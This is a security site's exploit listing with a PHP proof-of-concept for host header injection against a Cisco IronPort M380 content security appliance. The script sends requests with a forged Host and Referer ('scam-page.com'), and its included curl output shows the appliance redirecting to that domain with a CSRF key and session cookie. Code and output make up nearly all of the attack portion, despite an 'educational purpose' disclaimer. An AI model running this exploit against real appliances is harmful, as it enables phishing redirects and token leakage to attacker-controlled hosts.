Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification

2019.09.10
Credit: Todor Donev
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php // // Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit // // // Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> // // // Disclaimer: // This or previous programs are for Educational purpose ONLY. Do not use it without permission. // The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages // caused by direct or indirect use of the information or functionality provided by these programs. // The author or any Internet provider bears NO responsibility for content or misuse of these programs // or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, // system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's // responsibility. // // Use them at your own risk! // // // [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php // PHP <HIDDEN> Development Server started at Sun Sep 8 16:47:43 2019 // Listening on http://localhost:1337 // Document root is /home/test/ironport // Press Ctrl-C to quit. // * About to connect() to 192.168.1.1 port 443 (#0) // * Trying 192.168.1.1... * connected // * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0) // * Initializing NSS with certpath: sql:/etc/pki/nssdb // * skipping SSL peer certificate verification // * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 // * Server certificate: // * subject: // * start date: Mar 19 00:00:00 2018 GMT // * expire date: Mar 18 23:59:59 2020 GMT // * common name: // * issuer: // > GET / HTTP/1.1 // Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 // Cache-Control: no-cache // Content-Type: application/x-www-form-urlencoded; charset=utf-8 // Host: scam-page.com // Referer: scam-page.com // User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 // // * HTTP 1.0, assume close after body // < HTTP/1.0 303 Redirecting // < Server: glass/1.0 Python/2.6.4 // < Date: Sun, 08 Sep 2019 13:47:59 GMT // < Content-Type: text/html // < X-Frame-Options: SAMEORIGIN // < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure // < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0 // < Pragma: no-cache // < Expires: Sun, 08 Sep 2019 13:47:59 GMT // < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT // < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch // < // * Closing connection #0 // * About to connect() to 192.168.1.1 port 443 (#0) // * Trying 192.168.1.1... * connected // * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0) // * skipping SSL peer certificate verification // * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 // * Server certificate: // * subject: // * start date: Mar 19 00:00:00 2018 GMT // * expire date: Mar 18 23:59:59 2020 GMT // * common name: // * issuer: // > GET / HTTP/1.1 // Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 // Cache-Control: no-cache // Content-Type: application/x-www-form-urlencoded; charset=utf-8 // Host: scam-page.com // Referer: scam-page.com // User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 // // * HTTP 1.0, assume close after body // < HTTP/1.0 303 Redirecting // < Server: glass/1.0 Python/2.6.4 // < Date: Sun, 08 Sep 2019 13:48:00 GMT // < Content-Type: text/html // < X-Frame-Options: SAMEORIGIN // < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure // < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0 // < Pragma: no-cache // < Expires: Sun, 08 Sep 2019 13:48:00 GMT // < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT // < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch // < // * Closing connection #0 // $url = "https://192.168.1.1"; $fake_host = "scam-page.com"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_VERBOSE, true); $headers = [ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Cache-Control: public', 'Content-Type: application/x-www-form-urlencoded; charset=utf-8', 'Host: '.$fake_host, 'Referer: '.$fake_host, 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', ]; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $output = curl_exec($ch); curl_close($ch); echo $output;


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top